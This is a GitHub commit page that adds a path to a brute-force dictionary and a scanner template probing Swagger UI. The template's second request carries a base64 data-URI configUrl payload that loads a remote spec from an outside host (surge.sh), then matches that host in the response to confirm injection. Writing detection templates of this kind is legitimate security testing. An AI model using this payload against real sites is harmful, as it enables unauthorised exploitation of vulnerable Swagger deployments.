Skip to content

Commit

Permalink
x 2023-02-09
Browse files Browse the repository at this point in the history
  • Loading branch information
hktalent committed Feb 9, 2023
1 parent c515d08 commit ae21f31
Show file tree
Hide file tree
Showing 2 changed files with 30 additions and 0 deletions.
1 change: 1 addition & 0 deletions brute/dicts/filedic.txt
Original file line number Diff line number Diff line change
Expand Up @@ -102,6 +102,7 @@
/apps/frontend/modules/main/templates/loginSuccess.php
/apps/frontend/modules/main/validate/login.yml
/auth/login
/classicapi/doc/
/auth/login/github
/auth/login/google
/auth/login/sentry/
Expand Down
29 changes: 29 additions & 0 deletions config/51pwn/swagger.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
id: swagger_51pwn

info:
name: swagger api
author: 51pwn
severity: critical
description: |
swagger api
requests:
- raw:
- |
GET /classicapi/doc/ HTTP/1.1
Host: {{Hostname}}
- |
GET /classicapi/doc/?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ== HTTP/1.1
Host: {{Hostname}}
matchers-condition: or
stop-at-first-match: true
matchers:
- type: word
words:
- 'swagger.yaml'
condition: and
- type: word
words:
- 'exuberant-ice.surge.sh'
condition: and

0 comments on commit ae21f31

Please sign in to comment.